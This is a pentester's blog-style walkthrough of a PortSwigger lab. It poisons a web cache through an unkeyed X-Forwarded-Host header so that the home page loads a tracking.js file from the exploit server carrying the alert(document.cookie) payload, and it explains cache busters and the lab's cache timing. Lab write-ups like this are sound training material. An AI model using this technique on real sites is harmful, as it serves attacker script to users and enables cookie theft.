بسم الله الرحمن الرحيم
Hi everyone, I'm Eslam Atef, a Penetration Tester. I've been passionate about cybersecurity since my university days. Today, I'd like to share this lab with you, as I discovered some really useful insights and techniques while solving it that I believe can help others. Check it out!
lets start :)
i was learn new vulnerability which is cache poisoning and i accessed the lab .
It indicates that the request accepts a vulnerable header that is not properly sanitized, allowing it to control the host from which JavaScript files are loaded.
so i opened my burpsuite and start to catch home page get request in proxy and send it to repeater
then i started with X-Forwarded-For header and search in response with the value i set to it, but find no thing stored or reflected.
i searched about cache poisoning headers in google and find some of them here : https://www.fastly.com/documentation/guides/full-site-delivery/caching/preventing-cache-poisoning/
and i tried to use this headers in my attack and start with X-Forwarded-Host and it was the vulnerable header.
but note some thing : it injects inside host for src that load external js file from /resources/js/tracking.js directory
so all we need is to create our external server and make a directory in it with this path resources/js/tracking.js and set this js code in it :
alert(document.cookie)portswigger provide us with exploit server that we can use for this lab.
i set this path /resources/js/tracking.js as file name in exploit server
and set body of the file as our payload : alert(document.cookie) then click store.
in burpsuite use exploit server link and set it in vulnerable header
and because we are pentesters and not hackers if we in real or production environment we need to add cache buster to avoid affecting the page that real users visit it.
but what is cache buster ?
cache buster is query parameter we use to affect other version of the web page and not affecting the route page that all users visit and we set this query parameter like this site.com/?parm=test
and when the server hit this cache the page will be affected is this site.com/?parm=test and not site.com/ that real users visit.
so i set this param for test first before affect the original url.
send it again till server response with X-Cache: hit and note that Cache-Control : max-age=30 means that this file cache will be used or cached for 30 second only in server.
and then visit this link to know if it affected with js alert payload : homepagelink/?param=test and here we get xss payload executed by load js file from our external server.
remove this param=test from burpsuite and this mean we will affect the original page that all normal users visit and this to solve this lab only and Remember "don't do that in production environment".
that is all and lab solved :
now before we close this i want to show it's impact as a cache poisoning lead to stored xss via unkeyed header vulnerability:
This can lead to web cache poisoning, where a malicious script source is stored in the cache and served to other users. If exploited successfully, an attacker can execute JavaScript in victims' browsers, steal sensitive data such as cookies, or perform actions on behalf of the victim.
Happy Hacking …
feel free to contact : My Linkedin